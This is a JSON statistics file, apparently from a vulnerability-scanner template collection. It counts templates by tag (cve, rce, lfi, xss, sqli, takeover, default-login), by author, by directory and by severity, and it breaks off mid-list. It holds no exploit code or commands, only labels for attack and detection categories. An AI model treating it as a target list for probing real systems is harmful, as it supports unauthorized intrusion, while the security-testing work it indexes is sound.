octoprint","count":1},{"name":"monitorix","count":1},{"name":"csrf","count":1},{"name":"huijietong","count":1},{"name":"sqlite","count":1},{"name":"actuator","count":1},{"name":"qvisdvr","count":1},{"name":"razor","count":1},{"name":"ecoa","count":1},{"name":"tamronos","count":1},{"name":"processmaker","count":1},{"name":"basic-auth","count":1},{"name":"redmine","count":1},{"name":"sangfor","count":1},{"name":"ghost","count":1},{"name":"proftpd","count":1},{"name":"opentsdb","count":1},{"name":"linksys","count":1},{"name":"zenario","count":1},{"name":"lanproxy","count":1},{"name":"fortigates","count":1},{"name":"ognl","count":1},{"name":"logontracer","count":1},{"name":"haproxy","count":1},{"name":"drone","count":1},{"name":"monitorr","count":1},{"name":"setup","count":1},{"name":"gilacms","count":1},{"name":"perl","count":1},{"name":"vsftpd","count":1},{"name":"chyrp","count":1},{"name":"bitly","count":1},{"name":"mysql","count":1},{"name":"salesforce","count":1},{"name":"cse","count":1},{"name":"camunda","count":1},{"name":"clink-office","count":1},{"name":"simplecrm","count":1},{"name":"redhat","count":1},{"name":"daybyday","count":1},{"name":"miscrsoft","count":1},{"name":"redwood","count":1},{"name":"phpinfo","count":1},{"name":"triconsole","count":1},{"name":"flink","count":1},{"name":"olivetti","count":1},{"name":"wamp","count":1},{"name":"gloo","count":1},{"name":"comodo","count":1},{"name":"tenda","count":1},{"name":"gsoap","count":1},{"name":"upnp","count":1},{"name":"addpac","count":1},{"name":"geutebruck","count":1},{"name":"domxss","count":1},{"name":"yachtcontrol","count":1},{"name":"zarafa","count":1},{"name":"maccmsv10","count":1},{"name":"svn","count":1},{"name":"enum","count":1},{"name":"webftp","count":1},{"name":"nedi","count":1},{"name":"dompdf","count":1},{"name":"gespage","count":1},{"name":"primetek","count":1},{"name":"achecker","count":1},{"name":"heroku","count":1},{"name":"synnefo","count":1},{"name":"cockpit","count":1},{"name":"shopizer","count":1},{"name":"concrete","count":1},{"name":"websvn","count":1},{"name":"memcached","count":1},{"name":"mediumish","count":1},{"name":"jfrog","count":1},{"name":"visualtools","count":1},{"name":"wondercms","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"tensorboard","count":1},{"name":"shiro","count":1},{"name":"tika","count":1},{"name":"xff","count":1},{"name":"darkstat","count":1},{"name":"zookeeper","count":1},{"name":"vnc","count":1},{"name":"szhe","count":1},{"name":"office365","count":1},{"name":"rdp","count":1},{"name":"ioncube","count":1},{"name":"plastic","count":1},{"name":"netrc","count":1},{"name":"spectracom","count":1},{"name":"nuxeo","count":1},{"name":"totaljs","count":1},{"name":"metinfo","count":1},{"name":"pgadmin","count":1},{"name":"clave","count":1},{"name":"bazarr","count":1},{"name":"nexusdb","count":1},{"name":"ilo4","count":1},{"name":"plc","count":1},{"name":"jeewms","count":1},{"name":"pulsesecure","count":1},{"name":"sceditor","count":1},{"name":"craftcms","count":1},{"name":"websphere","count":1},{"name":"74cms","count":1},{"name":"sidekiq","count":1},{"name":"xunchi","count":1},{"name":"pippoint","count":1},{"name":"sco","count":1},{"name":"jenkin","count":1},{"name":"socomec","count":1},{"name":"fastcgi","count":1},{"name":"starttls","count":1},{"name":"commax","count":1},{"name":"myvuehelp","count":1},{"name":"cerebro","count":1},{"name":"rabbitmq","count":1},{"name":"iceflow","count":1},{"name":"traefik","count":1},{"name":"beanshell","count":1},{"name":"b2evolution","count":1},{"name":"mantis","count":1},{"name":"bookstack","count":1},{"name":"viewlinc","count":1},{"name":"sprintful","count":1},{"name":"acme","count":1},{"name":"javafaces","count":1},{"name":"fedora","count":1},{"name":"pacsone","count":1},{"name":"turbocrm","count":1},{"name":"livezilla","count":1},{"name":"vidyo","count":1},{"name":"ssltls","count":1},{"name":"diris","count":1},{"name":"pcoip","count":1},{"name":"pihole","count":1},{"name":"elasticsearch","count":1},{"name":"scs","count":1},{"name":"wing-ftp","count":1},{"name":"webmodule-ee","count":1},{"name":"javamelody","count":1},{"name":"maxsite","count":1},{"name":"nuuo","count":1},{"name":"dotnet","count":1},{"name":"codeigniter","count":1},{"name":"avtech","count":1},{"name":"saltapi","count":1},{"name":"arl","count":1},{"name":"ulterius","count":1},{"name":"rujjie","count":1},{"name":"qsan","count":1},{"name":"rmi","count":1},{"name":"spidercontrol","count":1},{"name":"metabase","count":1},{"name":"keenetic","count":1},{"name":"mobileiron","count":1},{"name":"mrtg","count":1},{"name":"tidb","count":1},{"name":"oidc","count":1},{"name":"rubedo","count":1},{"name":"lotuscms","count":1},{"name":"wifisky","count":1},{"name":"chinaunicom","count":1},{"name":"mongo","count":1},{"name":"blue-ocean","count":1},{"name":"node-red-dashboard","count":1},{"name":"sar2html","count":1},{"name":"froxlor","count":1},{"name":"alertmanager","count":1},{"name":"phalcon","count":1},{"name":"octobercms","count":1},{"name":"webui","count":1},{"name":"exacqvision","count":1},{"name":"swagger","count":1},{"name":"embedthis","count":1},{"name":"sourcebans","count":1},{"name":"tensorflow","count":1},{"name":"glances","count":1},{"name":"dotclear","count":1},{"name":"wildfly","count":1},{"name":"gitlist","count":1},{"name":"netgenie","count":1},{"name":"wooyun","count":1},{"name":"ewebs","count":1},{"name":"qdpm","count":1},{"name":"empirecms","count":1},{"name":"panos","count":1},{"name":"nps","count":1},{"name":"st","count":1},{"name":"wmt","count":1},{"name":"fortiweb","count":1},{"name":"rockethchat","count":1},{"name":"eyou","count":1},{"name":"zend","count":1},{"name":"viewpoint","count":1},{"name":"mantisbt","count":1},{"name":"timeclock","count":1},{"name":"database","count":1},{"name":"expose","count":1},{"name":"phpunit","count":1},{"name":"fortilogger","count":1},{"name":"cyberoam","count":1},{"name":"ntopng","count":1},{"name":"servicedesk","count":1},{"name":"tor","count":1},{"name":"gridx","count":1},{"name":"emby","count":1},{"name":"zzzcms","count":1},{"name":"nsasg","count":1},{"name":"lutron","count":1},{"name":"exposures","count":1},{"name":"hadoop","count":1},{"name":"oneblog","count":1},{"name":"bolt","count":1},{"name":"goahead","count":1},{"name":"appweb","count":1},{"name":"clockwatch","count":1},{"name":"robomongo","count":1},{"name":"parentlink","count":1},{"name":"stem","count":1},{"name":"ecom","count":1},{"name":"linkedin","count":1},{"name":"landray","count":1},{"name":"feifeicms","count":1},{"name":"klog","count":1},{"name":"subrion","count":1},{"name":"duomicms","count":1},{"name":"listserv","count":1},{"name":"zm","count":1},{"name":"centos","count":1},{"name":"crm","count":1},{"name":"kindeditor","count":1},{"name":"spring","count":1},{"name":"powercreator","count":1},{"name":"ambari","count":1},{"name":"calendarix","count":1},{"name":"jsp","count":1},{"name":"wazuh","count":1},{"name":"graphite","count":1},{"name":"openstack","count":1},{"name":"sureline","count":1},{"name":"xvr","count":1},{"name":"luftguitar","count":1},{"name":"moin","count":1},{"name":"frontpage","count":1},{"name":"email","count":1},{"name":"postmessage","count":1},{"name":"varnish","count":1},{"name":"cloudflare","count":1},{"name":"alibaba","count":1},{"name":"seacms","count":1},{"name":"tapestry","count":1},{"name":"nweb2fax","count":1},{"name":"alerta","count":1},{"name":"spf","count":1},{"name":"servicenow","count":1},{"name":"jaspersoft","count":1},{"name":"werkzeug","count":1},{"name":"opm","count":1},{"name":"clockwork","count":1},{"name":"minimouse","count":1},{"name":"visionhub","count":1},{"name":"bash","count":1},{"name":"rfi","count":1},{"name":"expressjs","count":1},{"name":"payara","count":1},{"name":"mariadb","count":1},{"name":"finereport","count":1},{"name":"smi","count":1},{"name":"api-manager","count":1},{"name":"smartblog","count":1},{"name":"csod","count":1},{"name":"chevereto","count":1},{"name":"htmli","count":1},{"name":"kerbynet","count":1},{"name":"aura","count":1},{"name":"pagespeed","count":1},{"name":"gstorage","count":1},{"name":"clusterengine","count":1},{"name":"circontrol","count":1},{"name":"resourcespace","count":1},{"name":"tectuus","count":1},{"name":"sql","count":1},{"name":"mautic","count":1},{"name":"zmanda","count":1},{"name":"bullwark","count":1},{"name":"thinkadmin","count":1},{"name":"yealink","count":1},{"name":"announcekit","count":1},{"name":"pyramid","count":1},{"name":"dnssec","count":1},{"name":"openerp","count":1},{"name":"labtech","count":1},{"name":"postgres","count":1},{"name":"cofax","count":1},{"name":"woocomernce","count":1},{"name":"oscommerce","count":1},{"name":"xiuno","count":1},{"name":"nc2","count":1},{"name":"springframework","count":1},{"name":"k8s","count":1},{"name":"elfinder","count":1},{"name":"trane","count":1},{"name":"ems","count":1},{"name":"wavlink","count":1},{"name":"wavemaker","count":1},{"name":"cloudinary","count":1},{"name":"cgi","count":1},{"name":"weiphp","count":1},{"name":"cve2006","count":1},{"name":"episerver","count":1},{"name":"openemr","count":1},{"name":"mpsec","count":1},{"name":"dom","count":1},{"name":"mara","count":1},{"name":"eprints","count":1},{"name":"soar","count":1},{"name":"svnserve","count":1},{"name":"nimble","count":1},{"name":"magicflow","count":1},{"name":"mailchimp","count":1},{"name":"zte","count":1},{"name":"opensmtpd","count":1},{"name":"realteo","count":1},{"name":"blind","count":1},{"name":"webmin","count":1},{"name":"enumeration","count":1},{"name":"nifi","count":1},{"name":"gateone","count":1},{"name":"couchbase","count":1},{"name":"scimono","count":1},{"name":"bigbluebutton","count":1},{"name":"plone","count":1},{"name":"natemail","count":1},{"name":"shoretel","count":1},{"name":"dbeaver","count":1},{"name":"gitea","count":1},{"name":"opencast","count":1},{"name":"jitsi","count":1},{"name":"solman","count":1},{"name":"argussurveillance","count":1},{"name":"tjws","count":1},{"name":"rsyncd","count":1},{"name":"opensns","count":1},{"name":"floc","count":1},{"name":"rocketchat","count":1},{"name":"erp-nc","count":1},{"name":"hiboss","count":1},{"name":"netmask","count":1},{"name":"fuelcms","count":1},{"name":"aspnuke","count":1},{"name":"azkaban","count":1},{"name":"smartsense","count":1},{"name":"kubeflow","count":1},{"name":"ueditor","count":1},{"name":"redis","count":1},{"name":"openrestry","count":1},{"name":"gotmls","count":1},{"name":"rmc","count":1},{"name":"portainer","count":1},{"name":"fortinet","count":1},{"name":"exponentcms","count":1},{"name":"mongoshake","count":1},{"name":"dotnetnuke","count":1},{"name":"xampp","count":1},{"name":"lotus","count":1},{"name":"xmlchart","count":1},{"name":"phpwiki","count":1},{"name":"apos","count":1},{"name":"optiLink","count":1},{"name":"tongda","count":1},{"name":"myucms","count":1},{"name":"ns","count":1},{"name":"cors","count":1},{"name":"fastapi","count":1},{"name":"blackboard","count":1},{"name":"zcms","count":1},{"name":"fortigate","count":1},{"name":"redcap","count":1},{"name":"webadmin","count":1},{"name":"graphql","count":1},{"name":"lighttpd","count":1},{"name":"trilithic","count":1},{"name":" default-login","count":1},{"name":"hortonworks","count":1},{"name":"centreon","count":1},{"name":"sentry","count":1},{"name":"cocoon","count":1},{"name":"codemeter","count":1},{"name":"auth","count":1},{"name":"karel","count":1},{"name":"default","count":1},{"name":"acontent","count":1},{"name":"rhymix","count":1},{"name":"owa","count":1},{"name":"mirai","count":1},{"name":"kyan","count":1},{"name":"meraki","count":1},{"name":"shopware","count":1},{"name":"ganglia","count":1},{"name":"vscode","count":1},{"name":"pmb","count":1},{"name":"solarlog","count":1},{"name":"phpfusion","count":1},{"name":"landrayoa","count":1},{"name":"tcexam","count":1},{"name":"zms","count":1},{"name":"cherokee","count":1},{"name":"jnoj","count":1},{"name":"vsphere","count":1},{"name":"idemia","count":1},{"name":"extractor","count":1},{"name":"shoppable","count":1},{"name":"dvwa","count":1},{"name":"terraform","count":1},{"name":"s3","count":1},{"name":"cobub","count":1},{"name":"sarg","count":1},{"name":"avalanche","count":1},{"name":"krweb","count":1},{"name":"upload","count":1},{"name":"owasp","count":1},{"name":"dvr","count":1},{"name":"lancom","count":1},{"name":"asus","count":1},{"name":"geddy","count":1},{"name":"etouch","count":1},{"name":"influxdb","count":1},{"name":"tieline","count":1},{"name":"sophos","count":1},{"name":"omi","count":1},{"name":"ssl","count":1},{"name":"gogs","count":1},{"name":"netdata","count":1},{"name":"openx","count":1},{"name":"jenzabar","count":1},{"name":"zyxel","count":1},{"name":"acexy","count":1},{"name":"graylog","count":1},{"name":"wiki","count":1},{"name":"anchorcms","count":1},{"name":"ruby","count":1},{"name":"lansweeper","count":1},{"name":"javascript","count":1},{"name":"eg","count":1},{"name":"biometrics","count":1},{"name":"emc","count":1},{"name":"clickhouse","count":1},{"name":"xdcms","count":1},{"name":"nomad","count":1},{"name":"tileserver","count":1},{"name":"twitter-server","count":1},{"name":"shopxo","count":1},{"name":"spip","count":1},{"name":"ruckus","count":1},{"name":"checkpoint","count":1},{"name":"artica","count":1},{"name":"iptime","count":1},{"name":"apiman","count":1},{"name":"grails","count":1},{"name":"eyelock","count":1},{"name":"phpfastcache","count":1},{"name":"openvpn","count":1},{"name":"mdb","count":1},{"name":"adb","count":1},{"name":"glowroot","count":1},{"name":"whm","count":1},{"name":"discourse","count":1},{"name":"jquery","count":1},{"name":"ricoh","count":1},{"name":"discord","count":1},{"name":"expn","count":1},{"name":"panabit","count":1},{"name":"moinmoin","count":1},{"name":"sage","count":1},{"name":"beanstalk","count":1},{"name":"gunicorn","count":1},{"name":"esmtp","count":1},{"name":"circontrorl","count":1},{"name":"burp","count":1},{"name":"timesheet","count":1},{"name":"majordomo2","count":1},{"name":"doh","count":1},{"name":"skywalking","count":1},{"name":"xml","count":1},{"name":"lg-nas","count":1},{"name":"zeroshell","count":1},{"name":"interlib","count":1},{"name":"tpshop","count":1},{"name":"sgp","count":1},{"name":"jmx","count":1},{"name":"elascticsearch","count":1},{"name":"selea","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":196},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":65},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":37},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"kophjager007","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"meme-lord","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"elsfa7110","count":5},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"emenalf","count":3},{"name":"incogbyte","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"shifacyclewala","count":3},{"name":"idealphase","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"z3bd","count":3},{"name":"sushantkamble","count":3},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"skeltavik","count":3},{"name":"tess","count":3},{"name":"mavericknerd","count":3},{"name":"vsh00t","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"johnk3r","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"_generic_human_","count":3},{"name":"unstabl3","count":3},{"name":"shine","count":3},{"name":"foulenzer","count":2},{"name":"randomrobbie","count":2},{"name":"w4cky_","count":2},{"name":"bing0o","count":2},{"name":"0xsmiley","count":2},{"name":"0xsapra","count":2},{"name":"random-robbie","count":2},{"name":"0xcrypto","count":2},{"name":"pxmme1337","count":2},{"name":"ree4pwn","count":2},{"name":"whoever","count":2},{"name":"gevakun","count":2},{"name":"nkxxkn","count":2},{"name":"amsda","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"arcc","count":2},{"name":"convisoappsec","count":2},{"name":"gal nagli","count":2},{"name":"kiblyn11","count":2},{"name":"davidmckennirey","count":2},{"name":"hahwul","count":2},{"name":"0xprial","count":2},{"name":"hetroublemakr","count":2},{"name":"swissky","count":2},{"name":"dheerajmadhukar","count":2},{"name":"r3naissance","count":2},{"name":"cocxanh","count":2},{"name":"huowuzhao","count":2},{"name":"zomsop82","count":2},{"name":"johnjhacking","count":2},{"name":"mohammedsaneem","count":2},{"name":"vavkamil","count":2},{"name":"afaq","count":2},{"name":"bernardofsr","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"moritz nentwig","count":2},{"name":"koti2","count":2},{"name":"alifathi-h1","count":2},{"name":"lotusdll","count":2},{"name":"0xelkomy","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"0xrudra","count":2},{"name":"x1m_martijn","count":2},{"name":"udit_thakkur","count":2},{"name":"chron0x","count":1},{"name":"c3l3si4n","count":1},{"name":"xstp","count":1},{"name":"adrianmf","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thevillagehacker","count":1},{"name":"ahmed sherif","count":1},{"name":"nytr0gen","count":1},{"name":"hanlaomo","count":1},{"name":"b0rn2r00t","count":1},{"name":"un-fmunozs","count":1},{"name":"co0nan","count":1},{"name":"elder tao","count":1},{"name":"intx0x80","count":1},{"name":"ohlinge","count":1},{"name":"ajaysenr","count":1},{"name":"revblock","count":1},{"name":"petruknisme","count":1},{"name":"fopina","count":1},{"name":"naglinagli","count":1},{"name":"yashanand155","count":1},{"name":"akshansh","count":1},{"name":"ahmetpergamum","count":1},{"name":"streetofhackerr007","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"j33n1k4","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xrod","count":1},{"name":"ipanda","count":1},{"name":"exploitation","count":1},{"name":"alperenkesk","count":1},{"name":"me9187","count":1},{"name":"mass0ma","count":1},{"name":"push4d","count":1},{"name":"akash.c","count":1},{"name":"sec_hawk","count":1},{"name":"andysvints","count":1},{"name":"mhdsamx","count":1},{"name":"juicypotato1","count":1},{"name":"52971","count":1},{"name":"knassar702","count":1},{"name":"shifacyclewla","count":1},{"name":"daviey","count":1},{"name":"hakluke","count":1},{"name":"luskabol","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mesaglio","count":1},{"name":"kurohost","count":1},{"name":"regala_","count":1},{"name":"mah3sec_","count":1},{"name":"geraldino2","count":1},{"name":"toufik airane","count":1},{"name":"shelld3v","count":1},{"name":"rojanrijal","count":1},{"name":"rodnt","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"cookiehanhoan","count":1},{"name":"absshax","count":1},{"name":"ilovebinbash","count":1},{"name":"willd96","count":1},{"name":"sullo","count":1},{"name":"divya_mudgal","count":1},{"name":"zandros0","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"b0yd","count":1},{"name":"luci","count":1},{"name":"ldionmarcil","count":1},{"name":"kre80r","count":1},{"name":"tirtha_mandal","count":1},{"name":"raesene","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"evolutionsec","count":1},{"name":"@dwisiswant0","count":1},{"name":"ooooooo_q","count":1},{"name":"schniggie","count":1},{"name":"_harleo","count":1},{"name":"yavolo","count":1},{"name":"notsoevilweasel","count":1},{"name":"makyotox","count":1},{"name":"apt-mirror","count":1},{"name":"th3.d1p4k","count":1},{"name":"wabafet","count":1},{"name":"shreyapohekar","count":1},{"name":"sicksec","count":1},{"name":"undefl0w","count":1},{"name":"pdp","count":1},{"name":"gboddin","count":1},{"name":"retr0","count":1},{"name":"rotemreiss","count":1},{"name":"whynotke","count":1},{"name":"sy3omda","count":1},{"name":"remonsec","count":1},{"name":"philippdelteil","count":1},{"name":"kareemse1im","count":1},{"name":"andirrahmani1","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"_darrenmartyn","count":1},{"name":"s1r1u5_","count":1},{"name":"jeya seelan","count":1},{"name":"noamrathaus","count":1},{"name":"brabbit10","count":1},{"name":"yashgoti","count":1},{"name":"0ut0fb4nd","count":1},{"name":"affix","count":1},{"name":"zhenwarx","count":1},{"name":"sshell","count":1},{"name":"taielab","count":1},{"name":"vzamanillo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0xteles","count":1},{"name":"elmahdi","count":1},{"name":"furkansenan","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"kabirsuda","count":1},{"name":"0xtavian","count":1},{"name":"alex","count":1},{"name":"ringo","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"pudsec","count":1},{"name":"infosecsanyam","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"udyz","count":1},{"name":"dawid-czarnecki","count":1},{"name":"becivells","count":1},{"name":"thezakman","count":1},{"name":"tim_koopmans","count":1},{"name":"mubassirpatel","count":1},{"name":"pratik khalane","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"flag007","count":1},{"name":"deena","count":1},{"name":"aresx","count":1},{"name":"its0x08","count":1},{"name":"b4uh0lz","count":1},{"name":"fmunozs","count":1},{"name":"bad5ect0r","count":1},{"name":"bolli95","count":1},{"name":"qlkwej","count":1},{"name":"micha3lb3n","count":1},{"name":"izn0u","count":1},{"name":"nerrorsec","count":1},{"name":"bjhulst","count":1},{"name":"defr0ggy","count":1},{"name":"d0rkerdevil","count":1},{"name":"jteles","count":1},{"name":"omarkurt","count":1},{"name":"iampritam","count":1},{"name":"patralos","count":1},{"name":"smaranchand","count":1},{"name":"soyelmago","count":1},{"name":"alph4byt3","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"0h1in9e","count":1},{"name":"_c0wb0y_","count":1},{"name":"x6263","count":1},{"name":"berkdusunur","count":1},{"name":"blckraven","count":1},{"name":"manikanta a.k.a @secureitmania","count":1}],"directory":[{"name":"cves","count":724},{"name":"vulnerabilities","count":299},{"name":"exposed-panels","count":248},{"name":"technologies","count":190},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":642},{"name":"high","count":552},{"name":"medium","count":449},{"name":"critical","count":271},{"name":"low","count":152}],"types":[{"name":"http","count":1962},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":725},{"name":"lfi","count":260},{"name":"panel","count":248},{"name":"xss","count":244},{"name":"exposure","count":231},{"name":"wordpress","count":223},{"name":"rce","count":198},{"name":"tech","count":181},{"name":"cve2020","count":164},{"name":"wp-plugin","count":149},{"name":"cve2021","count":127},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":85},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"iot","count":62},{"name":"oob","count":53},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":41},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"cve2016","count":36},{"name":"","count":36},{"name":"oracle","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"misc","count":23},{"name":"cve2015","count":23},{"name":"disclosure","count":21},{"name":"generic","count":20},{"name":"auth-bypass","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"router","count":19},{"name":"debug","count":18},{"name":"cve2014","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"php","count":16},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"login","count":14},{"name":"cve2011","count":14},{"name":"struts","count":14},{"name":"cve2012","count":14},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"dlink","count":12},{"name":"aws","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"intrusive","count":9},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"nginx","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"rails","count":8},{"name":"vmware","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"files","count":7},{"name":"ibm","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"cms","count":7},{"name":"microsoft","count":7},{"name":"kubernetes","count":7},{"name":"confluence","count":7},{"name":"google","count":7},{"name":"django","count":6},{"name":"cve2008","count":6},{"name":"solr","count":6},{"name":"api","count":6},{"name":"jetty","count":6},{"name":"laravel","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"deserialization","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"hp","count":5},{"name":"tomcat","count":5},{"name":"nodejs","count":5},{"name":"fileupload","count":5},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"symfony","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"webserver","count":4},{"name":"strapi","count":4},{"name":"proxy","count":4},{"name":"samsung","count":4},{"name":"exchange","count":4},{"name":"symantec","count":4},{"name":"grafana","count":4},{"name":"camera","count":4},{"name":"magmi","count":4},{"name":"resin","count":4},{"name":"zimbra","count":4},{"name":"firmware","count":4},{"name":"moodle","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"zabbix","count":4},{"name":"wso2","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"git","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"kevinlab","count":3},{"name":"nacos","count":3},{"name":"amazon","count":3},{"name":"ebs","count":3},{"name":"mongodb","count":3},{"name":"tikiwiki","count":3},{"name":"openssh","count":3},{"name":"opensis","count":3},{"name":"npm","count":3},{"name":"slack","count":3},{"name":"terramaster","count":3},{"name":"itop","count":3},{"name":"ofbiz","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"fanruan","count":3},{"name":"bitrix","count":3},{"name":"vbulletin","count":3},{"name":"targa","count":3},{"name":"backups","count":3},{"name":"prometheus","count":3},{"name":"bigip","count":3},{"name":"microstrategy","count":3},{"name":"oa","count":3},{"name":"smtp","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"firebase","count":3},{"name":"injection","count":3},{"name":"druid","count":3},{"name":"ssh","count":3},{"name":"telerik","count":3},{"name":"kibana","count":3},{"name":"mail","count":3},{"name":"kafka","count":3},{"name":"hoteldruid","count":3},{"name":"jellyfin","count":3},{"name":"linkerd","count":3},{"name":"nexus","count":3},{"name":"openam","count":3},{"name":"httpd","count":3},{"name":"caucho","count":3},{"name":"cacti","count":3},{"name":"zhiyuan","count":3},{"name":"jeesns","count":3},{"name":"waf","count":2},{"name":"minio","count":2},{"name":"db","count":2},{"name":"plesk","count":2},{"name":"netsweeper","count":2},{"name":"trixbox","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"hasura","count":2},{"name":"enumeration","count":2},{"name":"ilo","count":2},{"name":"natshell","count":2},{"name":"storage","count":2},{"name":"middleware","count":2},{"name":"akamai","count":2},{"name":"ecology","count":2},{"name":"sonarqube","count":2},{"name":"bypass","count":2},{"name":"geowebserver","count":2},{"name":"hpe","count":2},{"name":"getsimple","count":2},{"name":"ucmdb","count":2},{"name":"grav","count":2},{"name":"webcam","count":2},{"name":"couchdb","count":2},{"name":"smb","count":2},{"name":"activemq","count":2},{"name":"fortios","count":2},{"name":"splunk","count":2},{"name":"avantfax","count":2},{"name":"dos","count":2},{"name":"icewarp","count":2},{"name":"glassfish","count":2},{"name":"bucket","count":2},{"name":"rockmongo","count":2},{"name":"node","count":2},{"name":"huawei","count":2},{"name":"akkadian","count":2},{"name":"qcubed","count":2},{"name":"emerge","count":2},{"name":"maian","count":2},{"name":"nextjs","count":2},{"name":"harbor","count":2},{"name":"adminer","count":2},{"name":"odoo","count":2},{"name":"phpcollab","count":2},{"name":"kong","count":2},{"name":"chiyu","count":2},{"name":"service","count":2},{"name":"vrealize","count":2},{"name":"hashicorp","count":2},{"name":"frp","count":2},{"name":"status","count":2},{"name":"ec2","count":2},{"name":"seeyon","count":2},{"name":"flir","count":2},{"name":"wordfence","count":2},{"name":"idrac","count":2},{"name":"voipmonitor","count":2},{"name":"sonicwall","count":2},{"name":"hostheader-injection","count":2},{"name":"c